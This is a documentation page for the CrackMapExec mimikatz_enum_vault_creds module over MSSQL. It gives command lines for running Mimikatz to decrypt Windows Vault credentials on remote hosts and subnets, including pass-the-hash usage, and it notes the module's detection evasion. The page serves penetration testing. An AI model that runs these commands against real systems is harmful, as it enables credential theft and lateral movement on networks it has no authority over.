CrackMapExec Mimikatz_enum_vault_creds (mssql)
This page contains detailed information about how to use the mimikatz_enum_vault_creds CME module while using the mssql protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.
Description
This module executes PowerSploit's Invoke-Mimikatz.ps1 script (Mimikatz's DPAPI Module) and decrypts stored credentials in the Windows Vault/Credential Manager.
The mimikatz_enum_vault_creds module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.
Supported Protocols
- mssql
- smb
Module Source Code
Authors
Module Usage
This is how to use the mimikatz_enum_vault_creds module while using the mssql protocol:
Syntax:
# cme mssql <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M mimikatz_enum_vault_creds
Admin user:
# cme mssql 10.0.5.1 -u sa -p P@ss123 -d . -M mimikatz_enum_vault_creds
# cme mssql 10.0.5.1 -u sa -p P@ss123 --local-auth -M mimikatz_enum_vault_creds
Normal user:
# cme mssql 10.0.5.1 -u dbuser -p P@ss123 -d target.corp -M mimikatz_enum_vault_creds
CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:
# cme mssql 10.0.5.1 -u sa -H 432b022dc22aa5afe884e986b8383ff2 -d . -M mimikatz_enum_vault_creds
# cme mssql 10.0.5.1 -u dbuser -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M mimikatz_enum_vault_creds
# cme mssql target_list.txt -u sa -p P@ss123 -d . -M mimikatz_enum_vault_creds
# cme mssql 10.0.5.0/24 -u sa -p P@ss123 -d . -M mimikatz_enum_vault_creds
# cme mssql 10.0.5.1-100 -u sa -p P@ss123 -d . -M mimikatz_enum_vault_creds
Module Options
As you can see below, the mimikatz_enum_vault_creds module doesn't have any additional options:
# cme mssql -M mimikatz_enum_vault_creds --options
[*] mimikatz_enum_vault_creds module options:
References
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
- https://www.infosecmatter.com/powershell-commands-for-pentesters/#get-stored-passwords-from-windows-passwordvault
Version
This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.